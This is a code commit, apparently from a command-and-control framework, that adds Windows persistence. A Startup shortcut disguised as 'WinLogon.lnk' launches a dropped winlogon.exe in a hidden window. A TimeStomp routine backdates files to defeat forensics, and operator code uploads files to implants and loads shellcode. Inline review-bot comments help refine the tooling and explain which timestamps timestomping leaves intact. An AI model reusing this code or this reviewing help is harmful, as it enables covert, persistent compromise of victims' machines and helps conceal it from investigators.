Updated InstallEXE-Persistence

chunking
benpturner 2018-08-09 10:40:35 +01:00
parent c5fd843a8e
commit 4f4b8610a2
3 changed files with 43 additions and 28 deletions


@ -397,7 +397,15 @@ def runcommand(command, randomuri):
command = command.replace('sleep ', '')
command = command.replace('beacon ', '')
update_sleep(command, randomuri)
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(posh_help, '\n')
for line in helpfull:
if searchterm in line:
print line
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
@ -674,8 +682,10 @@ def runcommand(command, randomuri):
s = source_file.read()
source = base64.b64encode(s)
if s:
destination = (args.destination).replace("\\","\\\\")
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (args.destination, source)
destination = args.destination.replace("\\","\\\\")
print ""
print "Uploading %s to %s" % (args.source, destination)
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source)
new_task(uploadcommand, randomuri)
except Exception as e:
print "Error with source file: %s" % e
@ -739,14 +749,6 @@ def runcommand(command, randomuri):
except Exception as e:
print "Error loading file: %s" % e
elif "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(posh_help, '\n')
for line in helpfull:
if searchterm in line:
print line
elif "listmodules" in command.lower():
print os.listdir("%s/Modules/" % POSHDIR)
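Review bot: In the upload hunk the operator-supplied path is interpolated into a double-quoted PowerShell argument (`uploadcommand = "Upload-File -Destination \"%s\" ..."`), but only backslashes are doubled, so a destination containing `"`, `` ` `` or `$` would break the command or be expanded on the implant side; if the string is executed as-is by the implant, the same `.replace` chain should also escape those characters, e.g. `destination = args.destination.replace("\\","\\\\").replace('`','``').replace('"','`"').replace('$','`$')`. I cannot see from the hunk whether an intermediate encoding layer is what motivates the backslash doubling, so confirm against the transport before changing it. Separately, the relocated `searchhelp` branch matches with `"searchhelp" in command.lower()`, and since it now sits earlier in the chain any command merely containing that word is swallowed by it; `command.lower().startswith("searchhelp")` would be tighter, and `posh_help.split('\n')` avoids the Python-3-removed `string.split` while keeping Python 2 behaviour. The enclosing `runcommand` starts and ends outside these hunks.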


@ -202,28 +202,40 @@ Function Install-Persistence
}
}
Function InstallExe-Persistence() {
$SourceEXE = "rundll32.exe"
$ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
$DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.TargetPath = $SourceEXE
$Shortcut.Arguments = $ArgumentsToSourceExe
$Shortcut.WindowStyle = 7
$Shortcut.Save()
TimeStomp $DestinationPath "01/03/2008 12:12 pm"
If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
Write-Output "Created StartUp file Exe persistence: $DestinationPath"
if (Test-Path "$env:Temp\Winlogon.exe") {
$SourceEXE = "rundll32.exe"
$ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
$DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.TargetPath = $SourceEXE
$Shortcut.Arguments = $ArgumentsToSourceExe
$Shortcut.WindowStyle = 7
$Shortcut.Save()
TimeStomp $DestinationPath "01/03/2008 12:12 pm"
TimeStomp "$env:Temp\Winlogon.exe" "01/03/2008 12:12 pm"
If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
Write-Output "Created StartUp file Exe persistence: $DestinationPath"
} else {
Write-Output "Error installing StartUp Exe persistence"
Write-Output "Upload EXE to $env:Temp\Winlogon.exe"
}
} else {
Write-Output "Error installing StartUp Exe persistence"
Write-Output "Upload EXE to $env:Temp\Winlogon.exe"
}
}
Function RemoveExe-Persistence() {
$DestinationPath1 = "$env:Temp\winlogon.exe"
Remove-Item -Force $DestinationPath1
If (Test-Path $DestinationPath1) {
Remove-Item -Force $DestinationPath1
}
$DestinationPath2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
Remove-Item -Force $DestinationPath2
TimeStomp $DestinationPath "01/03/2008 12:12 pm"
If (Test-Path $DestinationPath2) {
Remove-Item -Force $DestinationPath2
}
If ((Test-Path $DestinationPath1) -or ((Test-Path $DestinationPath2))) {
Write-Output "Unable to Remove Persistence"
} else {
@ -726,7 +738,7 @@ elseif ([IntPtr]::size -eq 4) {
}
}
Function TimeStomp($File, $Date) {
$file=(gi $file)
$file=(gi $file -force)
$file.LastWriteTime=$date;
$file.LastAccessTime=$date;
$file.CreationTime=$date;
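Review bot: The inner `else` of `InstallExe-Persistence` (the one after `Write-Output "Created StartUp file Exe persistence: $DestinationPath"`) is only reachable once `Test-Path "$env:Temp\Winlogon.exe"` has already succeeded, yet it still tells the operator `Upload EXE to $env:Temp\Winlogon.exe`; that hint belongs only to the outer `else`, and the inner branch should instead report that the shortcut was not written, e.g. `Write-Output "Error creating StartUp shortcut: $DestinationPath"`. `TimeStomp` still has no guard when `gi $file -force` returns nothing, so a bad path turns into three property-assignment errors rather than one clear message; a `-ErrorAction Stop` on the `gi` call, or an `if (-not $file) { return }` after it, would make the new `TimeStomp "$env:Temp\Winlogon.exe"` call fail loudly instead. As a caveat for the new EXE timestomp, setting the .NET `LastWriteTime`/`LastAccessTime`/`CreationTime` properties only rewrites the $STANDARD_INFORMATION timestamps; the $FILE_NAME attribute and the USN journal are untouched, so a forensic examiner comparing them will still see the real drop time. The first hunk's `RemoveExe-Persistence` continues past the end of the hunk.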


@ -16,8 +16,9 @@ def newTask(path):
for a in tasks:
command = a[2]
hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now()
print Colours.YELLOW,""
print "Command issued against implant %s on host %s %s" % (hostinfo[0],hostinfo[3],hostinfo[11])
print "Command issued against implant %s on host %s %s (%s)" % (hostinfo[0],hostinfo[3],hostinfo[11],now.strftime("%m/%d/%Y %H:%M:%S"))
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
print "Loading Shellcode",Colours.END
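Review bot: The new timestamp on the "Command issued against implant" line is a naive local time formatted as `%m/%d/%Y`, which is ambiguous across locales and cannot be correlated with implant-side or target-side logs during deconfliction or an incident review. Since these lines are effectively the operator audit trail, emit UTC in an unambiguous order, e.g. `now = datetime.datetime.utcnow()` and `now.strftime("%Y-%m-%d %H:%M:%S UTC")`. The hunk header suggests one more new-side line than is shown here, so `newTask` may continue past the last line visible.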